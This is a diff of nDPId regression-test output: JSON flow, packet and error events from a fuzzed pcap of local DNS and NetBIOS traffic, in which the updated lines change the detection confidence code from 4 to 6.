00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1120471033895,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1120471033895,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAADlbFMAAIARSWPAqAECwKgB\/wCKAIoA0VrwEQ6FZMCoAQIAigC7AAAgRUVEQURBBENERURHREZDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJOAP+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120471033895,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120471033895,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471036315,"flow_last_seen":1120471036315,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471036315,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1120471036315,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120471036315,"pkt":"ADBUADRWAODtAW69CABFAABEbFQAAIARSwHAqAECwKgBAQsKADUAMJWmjw4AAAABAAAAAAAAATEBEgEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471036315,"flow_last_seen":1120471036315,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471036315,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.?.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471036315,"flow_last_seen":1120471036315,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471036315,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.?.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1120471036317,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120471036317,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CwoAR3gijw6AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAgAwAAcAMAAwAAQAAJRAACwlsb2NhbGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":663,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471036315,"flow_last_seen":1120471036317,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471036317,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470848525,"flow_last_seen":1120470848527,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471036318,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":663,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471036315,"flow_last_seen":1120471036317,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471036317,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470848525,"flow_last_seen":1120470848527,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471036318,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470848643,"flow_last_seen":1120470851639,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471036318,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471048339,"flow_last_seen":1120471048339,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471048339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.114","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1120471048339,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471048339,"pkt":"ADBUADRWAODtAW69CABFAABIbFYAAIARSvvAqAECwKgBcgsLADUANESJJXMAAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471048339,"flow_last_seen":1120471048339,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471048339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.114","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471048339,"flow_last_seen":1120471048339,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471048339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.114","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471049334,"flow_last_seen":1120471049334,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471049334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1120471049334,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471049334,"pkt":"ADBUADRWAODtAW69CABFAABIbFcAAIARSvrAqAECwKgBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaU15Alb4AAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471049334,"flow_last_seen":1120471049334,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471049334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercimy.v?","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471049334,"flow_last_seen":1120471049334,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471049334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercimy.v?","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":667,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":18432,"global_ts_msec":1120471051336} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":667,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":18432,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471049334,"pkt":"ADBUADRWAODtAW69SABFAABIbFgAAIARQvnAqAECwKgBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1120471053339,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471053339,"pkt":"ADBUADRWAODtAW69CABFAABIbFkAAIARSvjAqAECwKoBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJj8XR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberc?ty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberc?ty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":669,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120471057345} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":669,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471053339,"pkt":"ADBcADRHAODtAW69CABgAABIbFoAAIARSvfAqAECwKgBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liRXdjaXR5AmRrAAAhgAE="} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470442140,"flow_last_seen":1120470442140,"flow_idle_time":620000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":19,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1292,65 +1292,65 @@ 00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470187656,"flow_last_seen":1120470440137,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":37,"flow_datalink":1,"flow_max_packets":3} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865650,"flow_last_seen":1120470865650,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2805,"dst_port":51,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865650,"flow_last_seen":1120470865650,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2805,"dst_port":51,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00594{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470865712,"flow_last_seen":1120470874723,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065347,"flow_last_seen":1120471065347,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2828,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1120471065347,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120471065347,"pkt":"ADBUADRWAODtAW69CABFAABEJXMAAIARSvrAqAECwKgBAQsMADUAMOiAPDIAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065347,"flow_last_seen":1120471065347,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2828,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065347,"flow_last_seen":1120471065347,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2828,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":671,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471065349,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1120471065349,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120471065349,"pkt":"AODtAW69ADBUADRWCABFAABbAAFAAEARtz7AqAEBwKgBAgA1CgwAR8r8PDKAAAABAAHJAAAAATEBMAEwAzEyN0ppbi1hZGRyBGFycGEAABwAAcAMAAwAAQBsJxAADwlsb2NhbGhvc3QA"} 
